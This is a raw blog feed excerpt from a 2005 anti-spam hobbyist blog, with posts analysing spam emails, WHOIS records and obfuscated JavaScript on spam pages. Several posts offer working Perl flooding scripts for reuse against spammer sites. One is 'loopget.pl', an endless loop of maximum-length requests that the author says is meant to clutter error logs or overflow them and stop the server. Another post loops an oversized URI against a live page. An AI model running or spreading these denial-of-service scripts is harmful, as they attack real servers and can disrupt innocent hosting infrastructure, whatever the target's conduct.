/&gt;OTMyMzg1ODg5MDcuNDA5ODpob190cXA 200 OK&lt;br /&gt;MjkxMzU1Nzg2MzkuNTEzNTp2d3g0dCU 200 OK&lt;br /&gt;Nzc4NDE4ODU2NjYuNTcwNzp3cHJfYjk 200 OK&lt;br /&gt;NDM1NDM1NzczNjcuMDE4OTptX3I1MXg 200 OK&lt;br /&gt;NzQxNjA5NDQwMjAuNjYyNTo0anpxa2N 200 OK&lt;br /&gt;MTQ0ODU5MDUzODkwLjc3MTp5ZjFsfHN 200 OK&lt;br /&gt;MTAwOTkzMjE0NTEwLjU1ODpqcGYtcCV 200 OK&lt;br /&gt;MTM5NjM3MTk0ODk5LjQwNjppdmhmdW1 200 OK&lt;br /&gt;MTY5NzA4MTQyNDM4LjU3NjpyZWYtJXI 200 OK&lt;br /&gt;&lt;/block&gt;&lt;br /&gt;&lt;br /&gt;Here is the code which is free to use in the pursuit of spammer hunting.  &lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl -w&lt;br /&gt;use strict;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;use MIME::Base64;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;# Create a user agent object&lt;br /&gt;my $ua = LWP::UserAgent-&gt;new;&lt;br /&gt;$ua-&gt;agent("Mozilla/8.0"); # pretend we are very capable browser :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;my $baseURL='http://5bbegging.bubxsx.info/?';&lt;br /&gt;&lt;br /&gt;sub randomPassword {&lt;br /&gt; my $password;&lt;br /&gt; my $_rand;&lt;br /&gt;&lt;br /&gt; my $password_length = $_[0];&lt;br /&gt; if (!$password_length) {&lt;br /&gt;  $password_length = 10;&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; my @chars = split(" ",&lt;br /&gt; "a b c d e f g h i j k l m n o p q r s t u v w x y z&lt;br /&gt;  - _ % # |&lt;br /&gt;  0 1 2 3 4 5 6 7 8 9");&lt;br /&gt;&lt;br /&gt; srand;&lt;br /&gt;&lt;br /&gt; for (my $i=0; $i &lt;= $password_length ;$i++) {&lt;br /&gt;  $_rand = int(rand 41);&lt;br /&gt;  $password .= $chars[$_rand];&lt;br /&gt; }&lt;br /&gt; return $password;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub getPage&lt;br /&gt;{&lt;br /&gt;my $key = localtime();&lt;br /&gt;#removing anything that is not a digit&lt;br /&gt;$key=~s/\D//g;&lt;br /&gt;$key=rand($key);&lt;br /&gt;my $text=randomPassword();&lt;br /&gt;my $encoded = encode_base64("$key:$text");&lt;br /&gt;&lt;br /&gt;#original email had a 16 char hash so just making sure mine is similar&lt;br /&gt;my $hash=substr($encoded,0,31);&lt;br /&gt;&lt;br /&gt;my $req = HTTP::Request-&gt;new(GET =&gt; $baseURL.$hash);&lt;br /&gt;$req-&gt;header('Accept' =&gt; 'text/html');&lt;br /&gt;&lt;br /&gt;# Pass request to the user agent and get a response back&lt;br /&gt;my $res = $ua-&gt;request($req);&lt;br /&gt;&lt;br /&gt;# Check the outcome of the response&lt;br /&gt;if ($res-&gt;is_success) {&lt;br /&gt;print $hash . " " .$res-&gt;status_line . "\n";&lt;br /&gt;}&lt;br /&gt;else {&lt;br /&gt;print "Error: " . $res-&gt;as_string . "\n" if ($res-&gt;status_line!~/404/);&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#######################################################&lt;br /&gt;# modified so non perl users won't hurt themselves :)&lt;br /&gt;# mine is set to 500 and I just run it a few times &lt;br /&gt;# a day.  feel free to set yours to 9999999999999&lt;br /&gt;#######################################################&lt;br /&gt;foreach my $try (1..2)&lt;br /&gt;{&lt;br /&gt;getPage();&lt;br /&gt;}&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-111633413637661745?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/111633413637661745/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=111633413637661745' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/111633413637661745'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/111633413637661745'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2005/05/quarkxpress-60-60.html' title='QuarkXPress 6.0 $60'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-111155590076121462</id><published>2005-03-22T23:45:00.000-05:00</published><updated>2005-03-23T00:35:56.356-05:00</updated><title type='text'>Re: Pharamacy[33:34]</title><content type='html'>&lt;Samad@kaytonelectric.com&gt;                                                      &lt;br /&gt;Delivered-To: jake@domain.com                                                   &lt;br /&gt;Received: (qmail 15747 invoked from network); 22 Mar 2005 17:14:52 -0000        &lt;br /&gt;Received: from unknown (HELO kaytonelectric.com) (81.158.238.67)                &lt;br /&gt;  by loop.phpwebhosting.com with SMTP; 22 Mar 2005 17:14:52 -0000               &lt;br /&gt;From: "Zofia Flood" &lt;Samad@kaytonelectric.com&gt;                                  &lt;br /&gt;To: "Dionysodoros Huff" &lt;jake@domain.com&gt;                                       &lt;br /&gt;Subject: Re: Pharamacy[33:34]                                                   &lt;br /&gt;Date: Tue, 22 Mar 2005 12:11:16 -0500                                           &lt;br /&gt;MIME-Version: 1.0                                                               &lt;br /&gt;Content-Type: multipart/alternative;                                            &lt;br /&gt; boundary="----=_NextPart_000_0008_01C52E1D.42405FCE"                    &lt;br /&gt;X-Priority: 3                                                                   &lt;br /&gt;X-MSMail-Priority: Normal                                                       &lt;br /&gt;X-Unsent: 1                                                                     &lt;br /&gt;X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106                        &lt;br /&gt;&lt;br /&gt;Hello , Visit Our PharmmacyByMailSHOP and Save 75%          &lt;br /&gt;&lt;http://www.bx.wc.com.bodpartatthe.com/&gt;                    &lt;br /&gt;&lt;br /&gt;Normally these types of URLs are meant to make someone think they are accessing a more reputable site.  Generally they are in the same field that they are pitching their wares from.  So this one is a bit confusing.  wc.com is the home of Williams &amp; Connolly which is a large litigation firm.  The spam is obviously trying to sell prescriptions so I'm not real sure what they are trying to do here.  Maybe bypass filters?&lt;br /&gt;&lt;br /&gt;the domain is owned by Richard Syke&lt;br /&gt;Domain Name : bodpartatthe.com&lt;br /&gt;&lt;br /&gt;::Registrant::&lt;br /&gt; Name      : Richard Syke&lt;br /&gt; Email     : richard_syke@yahoo.com&lt;br /&gt; Address   : 27/F One Pacific Place,&lt;br /&gt; Zipcode   : HK&lt;br /&gt; Nation    : HK&lt;br /&gt; Tel       : 1-888-242-0845&lt;br /&gt; Fax       : 1-888-242-0845&lt;br /&gt;&lt;br /&gt;::Administrative Contact::&lt;br /&gt; Name      : Richard Syke&lt;br /&gt; Email     : richard_syke@yahoo.com&lt;br /&gt; Address   : 27/F One Pacific Place,&lt;br /&gt; Zipcode   : HK&lt;br /&gt; Nation    : HK&lt;br /&gt; Tel       : 1-888-242-0845&lt;br /&gt; Fax       : 1-888-242-0845&lt;br /&gt;&lt;br /&gt;::Technical Contact::&lt;br /&gt; Name      : Richard Syke&lt;br /&gt; Email     : richard_syke@yahoo.com&lt;br /&gt; Address   : 27/F One Pacific Place,&lt;br /&gt; Zipcode   : HK&lt;br /&gt; Nation    : HK&lt;br /&gt; Tel       : 1-888-242-0845&lt;br /&gt; Fax       : 1-888-242-0845&lt;br /&gt;&lt;br /&gt;::Name Servers::&lt;br /&gt; ns0.vocalerformancare.com&lt;br /&gt; ns1.vocalerformancare.com&lt;br /&gt;&lt;br /&gt;::Dates &amp; Status::&lt;br /&gt; Created Date   2005-03-21 07:20:28 EST&lt;br /&gt; Updated Date   2005-03-21 07:20:28 EST&lt;br /&gt; Valid Date     2006-03-21 07:20:28 EST&lt;br /&gt; Status         ACTIVE&lt;br /&gt;&lt;br /&gt;The 'contact info' page lists the address as:&lt;br /&gt;Palm Grove House, P.O.Box 438, Road Town, Tortola, British Virgin Islands&lt;br /&gt;&lt;br /&gt;There is a secure code field in the form so one can not spam them from the web form.&lt;br /&gt;IS THIS IRONIC TO ANYONE ELSE?&lt;br /&gt;&lt;br /&gt;It's like a mugger concerned about being pickpocketed.  The system is retarded though.&lt;br /&gt;The image is created by going to a page called secure.asp.  This page takes a parameter which looks like MIME or something.  This creates the same image everytime.  So if one knows what the letters are encoded with then they will be able to "guess" the secret code by deriving it from the url supplied in the image.&lt;br /&gt;Example:&lt;br /&gt;http://www.bx.wc.com.bodpartatthe.com/aspx/secure.asp?text=UhYuh1t=&lt;br /&gt;AB392&lt;br /&gt;&lt;br /&gt;http://www.bx.wc.com.bodpartatthe.com/aspx/secure.asp?text=UTYuh1t=&lt;br /&gt;Bb392&lt;br /&gt;&lt;br /&gt;OK before breaking this .. well I guess it could be classified as crypto but that's sort of stretching the term... let's have some fun with their processes.  &lt;br /&gt;7 characters and we can just generate our own "image maker".  It actually takes more then 7 digits.  Since it's aspx (IIS6) there is a sanity checker on the length of the URI.  So just putting a few thousand characters got this response:&lt;br /&gt;&lt;br /&gt;Request-URI Too Large&lt;br /&gt;The requested URL's length exceeds the capacity limit for this server.&lt;br /&gt;&lt;br /&gt;request failed: URI too long&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This one works though:&lt;br /&gt;&lt;form&gt;&lt;br /&gt;&lt;textarea rows=3 cols=80&gt;&lt;br /&gt;http://www.bx.wc.com.bodpartatthe.com/aspx/secure.asp?text=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000=&lt;br /&gt;&lt;/textarea&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;It takes a few seconds to generate too!  Let's loop that a few times and see what happens.&lt;br /&gt;&lt;br /&gt;OK that's looping.  Now let's look at this wonderful crypto system.  It's using an example pasted from the MSDN site on &lt;a href="http://64.233.187.104/search?q=cache:QWf0Sp8VcJYJ:msdn.microsoft.com/library/en-us/dnnetsec/html/SecNetHT11.asp+secure.asp%3Ftext&amp;hl=en&amp;client=firefox-a"&gt;How to Store an Encrypted Connection&lt;/a&gt;&lt;br /&gt;Essentially it's just base64 encoded with a cipher.  So I know the input and output values and could just brute force my way through this.  I'm going to investigate and see if there is a more elegant solution.  Cryptanalysis is really not my strong suit.  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;UH OH!&lt;br /&gt;.Error: 500 read timeout&lt;br /&gt;Error: 500 Can't connect to www.bx.wc.com.bodpartatthe.com:80 (Bad hostname 'www.bx.wc.com.bodpartatthe.com')&lt;br /&gt;&lt;br /&gt;I was probobly just firewalled off.  Hey maybe that means I won't get anymore spam from them!! hooray!&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-111155590076121462?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/111155590076121462/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=111155590076121462' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/111155590076121462'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/111155590076121462'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2005/03/re-pharamacy3334.html' title='Re: Pharamacy[33:34]'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-110920131166641991</id><published>2005-02-23T18:18:00.000-05:00</published><updated>2005-03-23T00:41:37.850-05:00</updated><title type='text'>BlingCash alias (http://goodangerlamb.com/wxv.php)</title><content type='html'>Some may be fooled by the use of javascript encryption but the methods to defeat it and "unlock" what's inside are fairly trivial.  In one of my earlier blogs I mention searching out "document.write" and then replacing it with "alert".  This will just output the HTML into a harmless alert box that you can decipher on your own.  Copying isn't possible though and this became sort of a pain.  So I brushed off my ancient javascript foo and came up with this method which I find a little better.  First wrap the &amp;lt;script&amp;gt; in a &amp;lt;form&amp;gt; and then create a textarea.  instead of using "alert" use "formName.textArea.value=" which will fill in the text area for you.  I will demonstrate this using the example below from BlingCash.  &lt;br /&gt;&lt;form&gt;&lt;br /&gt;&lt;textarea cols=80 rows=3&gt;&lt;br /&gt;&amp;lt;form name=o&amp;gt;&lt;br /&gt;&amp;lt;textarea name="box" cols=80 rows=30&amp;gt;&amp;lt;/textarea&amp;gt;&lt;br /&gt;&amp;lt;script language=JavaScript&amp;gt;function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,2,34,62,41,25,39,40,61,9,0,0,0,0,0,0,47,46,54,36,21,18,17,5,4,22,12,11,14,58,59,23,43,26,52,6,50,3,53,15,35,24,48,0,0,0,0,44,0,20,30,31,57,42,60,8,29,1,37,28,27,19,51,13,33,32,16,45,49,55,0,56,38,10,7);for(j=Math.ceil(l/b);j&amp;gt;0;j--){r='';for(i=Math.min(l,b);i&amp;gt;0;i--,l--){w|=(t[x.charCodeAt(p++)-48])&amp;lt;&amp;lt;s;if(s){r+=String.fromCharCode(165^w&amp;255);w&amp;gt;&amp;gt;=8;s-=2}else{s=6}}document.o.box.value+=(r)}}decrypt_p("5BkRg6fx@x5RJzhTv@9tzPJRF0dt9mfTL642FnkR9Ufx@xdtyzJuGefTSPfTFUkuFXJZKUoxzboZFU8VKOwZH6_VvcYpy@_Vv6JZSzsVFmfVFXdpOUkRrc8TGLJt9loZzI7TKzfVHK_VFmfVFXdpOUkRrc8TGLJt9loZzI7TKl_TKzoZhzoTv@JRYbwVvzoRO@kpUmkTIUfpGefTIUkTvlkRIzotOzoxzboZFU8VKOwZH6_VvcYpy@kZOm_ZIzotOzoxzboZFU8VKOwZH6_VvcYpzK_ty6_TOXdpSI5jDI5jDbYp9UfZFXJtOKJnKXdpDbYpFPkVgmfV1nfTYbYjzIgTHcsZJ@_RJzkRoXdpDbYpgmfV1nfToUJn1ukRYbYjzIYRvuhRYb7pXW3wXW3wzAdP@x5RHckTvOwtychZvcoxzIdpGyonizhnYbgjDI9qzI7tv6kTIOotSnfT1XdpDbYpSUkT9OotizJnKKJxzIdpGBJZJKknFXdpaI5jvbwx@IYp5S8Vl3QpGIYp5ShZGEkTJKfTYb7tv@kRvc8pGLot9n_ZKXdpFPkVzAdPGIYpGIYp5QJZKzoZO@dPGIYpGIYp5Sotz6JZGyonizhnYbgjDI9qzI7VFnhTvXdpzPfViUfVgSsTD05paIhuGQsT9nkZGQwCmLdCmL46Gb_TOzJZOXwtyzhRyXf6GE5VhO7Vy6JniO7pmLdCmLdCzAdPGIYpGIYpGIYxFc8x@IYpGIYpGIYpGIYxFzkpzK_ty6_TOXdpSI5jDI4jqcYpH6Jn1@JxzQJZKzoZOcwx5L_TKzhpInfuvXdpObYpSPkTycoxzQwwXW3wXW3pGLJtSUJxzSWtoPJTHcwxTm38Pn3M205ptuJZGL_T96_TEnfT1O7VJzoZGQ_TKzotJ@_VGQWw8UWd46L0g1b0V6LNxnbfG2JtFUfVJmkT5ewZy@kRlx42Fzfx@IYpGIYpGIYp5eYRO@dPGIYpGIYp5eYRHckTv@dPGIYpGIYp5bfVl3QpGIYpGIYxUnJZ9z_VvzhpIzou9UJxzIotizJnKKf6Gb5VhN5pEnkZFuf6O19qbIYnvn_Zoz86rI5Vhcwx@IYpGIYpGxdtO@5xSUfTFUfVlx9RlxdZy@kRGefTS6JnSNJxzSsTD@YTylJtFn_TK@YnOUfZYyYnFzhVce72EKsRKbkTJ@_ZSm_Vo@7tyX_2vuonFP7Vvz_21bYpIzou9UJxzQJROlsTO05nH@kZzI7VJ0oZYbYCzIwZHlJZYbwfvchZH@JtzI7ty6_TOXdpSLdCkTdwXcwx5bfxq@bfqccptuLwGQWNtUbxybfx5ewZy@kRlx42r@5xyQJZKzoZO@5xzc8x@IYpGIYpGx42UnJZ9z_Vvz8x@IYpGIYxyShZl3QpGx42Fc8x@IYp5S8Vl3QpGIYp5ShZGEkTJKfTYb7tv@kRvc8pGLot9n_ZKXdpzPkRFPJTzAdPGIYpGIYp5bfVlxdtO@dPGIYpGIYp5bfVlxdtO@dPGIYpGIYp5L_TKzhpUm_tvXdptmknyXJtzI7VJ0oZYbwjzAdwychpHcJRIUkpSPJTD6JtJ@kRI6YpvXJtJ6kp5EkpIzou9UJxzSoZhzo2iU_tycotFn_TK05pr@kZvchTJ@JZbI7ty6_TO05pSLdCkTdwXcYpocoZUXdpgmJn9zsTcEftrloZjuJRKzsVmnkT9U_ty@_Vr6kRH@kRI@7tyXfplEftrloZjuJRKzsVmnkT9U_ty@_Vr6kRH@kRI@7tyXkxyEfx5ewZy@kRlxdtO@dPGIYpGIYp5L_TKzhpUm_tvXdptmknyXJtzI7VJ0oZYbwjzA5fyOwVvX_TmUkpkPJROloZ9WkpUcsTgOgt96kpUUhRrcoZG2JtJ6JnKK_V9IgZgmJn9OYxHO7VFnhTvXdpFUkuFXYZvl_TOmkRJPfTcIgRKzJZO6JnKU_6GQ_T9PfVcI7pmL96kL3wzIYnOUfZYbgTHnkTFPf6OUJTyWoZjuJRKzsVmnkT9U_ty@_Vr6kRH@kRI@7tyXfplboZgPfRvObnr@kRIWon96JZSPfTIUhTFmfTFl82SPJT5egtlx42UPfTF@dPGIYpGIYp5e7tv@kRvc8x@IYpGIYpGxdtO@5xzc8x@IYpGIYpGxdtO@5xzc8x@IYpGIYpGxdtO@5xzc8x@IYpGIYpGxdtO@5xzc8x@IYpGIYxyShZl3QpGx42Fc8x@x42Fmft9Ufx@3Qxyb_Tin8x@x42ozoT9@dP")&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;br /&gt;&lt;/textarea&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;Much easier to deal with in this way.  I've been toying around in perl with different types of "annoying" things to do.  The first is to fill in values for parameters with the max data (around 32K I think).  You'll know you've gone way too far when you get a 414 error which suggests the max URI size has been exceeded.  &lt;br /&gt;It is preferable to see that message and then back off a little to you get a 302 or some other error.  The idea is that while running in a loop the entire thing is logged into the web servers error logs.  Eventually this will make the logs&lt;br /&gt;1) uselessly cluttered with errors&lt;br /&gt;2) possibly overflow and stop the server&lt;br /&gt;&lt;br /&gt;I normally use this as filler&lt;br /&gt;my $message="STOP SPAMMING STOP SPAMMING STOP SPAMMING STOP SPAMMING" x 100;&lt;br /&gt;&lt;br /&gt;So the following is my loopget.pl script which politely asks the spammer to stop spamming me&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl -w&lt;br /&gt;use strict;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#copyright 2005 spamhunter&lt;br /&gt;#but uh feel free to use this for your own spam hunting adventures.  &lt;br /&gt;#no really it's ok&lt;br /&gt;&lt;br /&gt;my $ua = LWP::UserAgent-&amp;gt;new;&lt;br /&gt;$ua-&amp;gt;agent("Mozilla/8.0");&lt;br /&gt;my $message="STOP SPAMMING STOP SPAMMING STOP SPAMMING STOP SPAMMING" x 100;&lt;br /&gt;&lt;br /&gt;my $baseURL='http://www.blingcash.com/hit.php?w=' . $message;&lt;br /&gt;&lt;br /&gt;sub sendRequest&lt;br /&gt;{&lt;br /&gt;    my $target=shift;&lt;br /&gt;    my $url=$target;&lt;br /&gt;    my $req = HTTP::Request-&amp;gt;new(GET =&amp;gt; "$url");&lt;br /&gt;    $req-&amp;gt;header('Accept' =&amp;gt; 'text/html');  # send request&lt;br /&gt;    my $res = $ua-&amp;gt;request($req);  # check the outcome&lt;br /&gt;    if ($res-&amp;gt;is_success)&lt;br /&gt;    {&lt;br /&gt;       return $res-&amp;gt;content;&lt;br /&gt;    }&lt;br /&gt;    else&lt;br /&gt;    {&lt;br /&gt;       return "Error: " . $res-&amp;gt;status_line . "\n";&lt;br /&gt;    }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;while (1)&lt;br /&gt;{&lt;br /&gt;    print sendRequest($baseURL);&lt;br /&gt;}&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-110920131166641991?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/110920131166641991/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=110920131166641991' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/110920131166641991'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/110920131166641991'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2005/02/blingcash-alias-httpgoodangerlambcomwx.html' title='BlingCash alias (http://goodangerlamb.com/wxv.php)'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-109510742426356882</id><published>2004-09-13T16:28:00.000-04:00</published><updated>2004-09-13T16:31:04.543-04:00</updated><title type='text'>Are you people even TRYING anymore?</title><content type='html'>I get a spam today from "Kenneth" with a subject line of "&lt;a href=""&gt;It's me, Delilah ODL8710369  from AOL        8d&lt;/a&gt;".  Come one man, at least make the names match, or make them varients, or at the very least....make them the same gender.&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-109510742426356882?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/109510742426356882/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=109510742426356882' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109510742426356882'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109510742426356882'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2004/09/are-you-people-even-trying-anymore.html' title='Are you people even TRYING anymore?'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-109495672212271756</id><published>2004-09-11T21:46:00.000-04:00</published><updated>2004-09-11T22:39:31.393-04:00</updated><title type='text'>Self Milking Girls</title><content type='html'>Return-Path: &lt;kevon6hci com=""&gt;&lt;/kevon6hci&gt;&lt;/span&gt;&lt;br /&gt;Delivered-To: john@&lt;/span&gt;&lt;br /&gt;Received: (qmail 8544 invoked from network); 11 Sep 2004 03:15:12 -0000&lt;/span&gt;&lt;br /&gt;Received: from unknown (HELO pD958B23B.dip.t-dialin.net) (217.88.178.59)&lt;/span&gt;&lt;br /&gt;  by 2.69-93-235.reverse.theplanet.com with SMTP; 11 Sep 2004 03:15:12 -0000&lt;/span&gt;&lt;br /&gt;Received: from starmedia.com (mx1.latinmail.com [62.37.236.140])&lt;/span&gt;&lt;br /&gt;    by pD958B23B.dip.t-dialin.net (Postfix) with ESMTP id 6E2B185318&lt;/span&gt;&lt;br /&gt;    for &lt;john&gt;; Fri, 10 Sep 2004 20:15:12 -0700&lt;/john&gt;&lt;/span&gt;&lt;br /&gt;Message-ID: 